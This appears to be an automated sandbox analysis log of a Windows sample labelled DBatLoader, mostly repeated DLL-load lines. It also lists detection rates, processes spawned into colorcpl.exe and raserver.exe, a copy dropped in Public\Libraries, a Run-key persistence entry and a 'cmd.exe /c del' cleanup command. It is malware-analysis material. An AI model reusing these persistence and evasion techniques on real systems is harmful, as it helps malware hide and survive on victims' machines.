          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeSection loaded: amtahoo.dllJump to behavior
          Source: 0321423605241625.exeReversingLabs: Detection: 35%
          Source: 0321423605241625.exeVirustotal: Detection: 40%
          Source: C:\Users\user\Desktop\0321423605241625.exeFile read: C:\Users\user\Desktop\0321423605241625.exeJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\0321423605241625.exe C:\Users\user\Desktop\0321423605241625.exe
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Mwqrxeuz.exe "C:\Users\Public\Libraries\Mwqrxeuz.exe"
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Mwqrxeuz.exe "C:\Users\Public\Libraries\Mwqrxeuz.exe" Jump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FMJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/5@8/1
          Source: C:\Windows\explorer.exeFile read: C:\Users\Public\Libraries\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217823C GetDiskFreeSpaceA,0_2_0217823C
          Source: C:\Users\user\Desktop\0321423605241625.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02185770 CreateToolhelp32Snapshot,0_2_02185770
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_01
          Source: C:\Users\user\Desktop\0321423605241625.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
          Source: Binary string: colorcpl.pdbGCTL source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected DBatLoader
          Source: Yara matchFile source: 0.2.0321423605241625.exe.3baeed8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0321423605241625.exe.2170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0321423605241625.exe.3baeed8.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.308860487.0000000003BAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.308375056.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F2A4 push 0218F310h; ret 0_2_0218F308
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F0AC push 0218F125h; ret 0_2_0218F11D
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F144 push 0218F1ECh; ret 0_2_0218F1E4
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F1F8 push 0218F288h; ret 0_2_0218F280
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02190667 pushad ; ret 0_2_0219068D
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217C718 push ecx; mov dword ptr [esp], edx0_2_0217C71D
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217D78C push 0217D7B8h; ret 0_2_0217D7B0
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02185488 push 021854F2h; ret 0_2_021854EA
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021844AC push 021844EEh; ret 0_2_021844E6
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021884FB push 02188554h; ret 0_2_0218854C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021884FC push 02188554h; ret 0_2_0218854C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021835A8 push 02183653h; ret 0_2_0218364B
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021835A6 push 02183653h; ret 0_2_0218364B
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021765FC push 02176657h; ret 0_2_0217664F
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021765FA push 02176657h; ret 0_2_0217664F
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02176A48 push 02176A8Ah; ret 0_2_02176A82
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217CB4C push 0217CFA2h; ret 0_2_0217CF9A
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02173894 push eax; ret 0_2_021738D0
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217CE1C push 0217CFA2h; ret 0_2_0217CF9A
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FEA0 push 0217FF16h; ret 0_2_0217FF0E
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FFA4 push 0217FFF1h; ret 0_2_0217FFE9
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FFA3 push 0217FFF1h; ret 0_2_0217FFE9
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02188C58 push ecx; mov dword ptr [esp], edx0_2_02188C5D
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218EC64 push 0218EE54h; ret 0_2_0218EE4C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E6D0D1 push ecx; ret 1_2_06E6D0E4
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02186388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,0_2_02186388
          Source: C:\Users\user\Desktop\0321423605241625.exeFile created: C:\Users\Public\Libraries\Mwqrxeuz.exeJump to dropped file
          Source: C:\Users\user\Desktop\0321423605241625.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MwqrxeuzJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MwqrxeuzJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021854F4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_021854F4
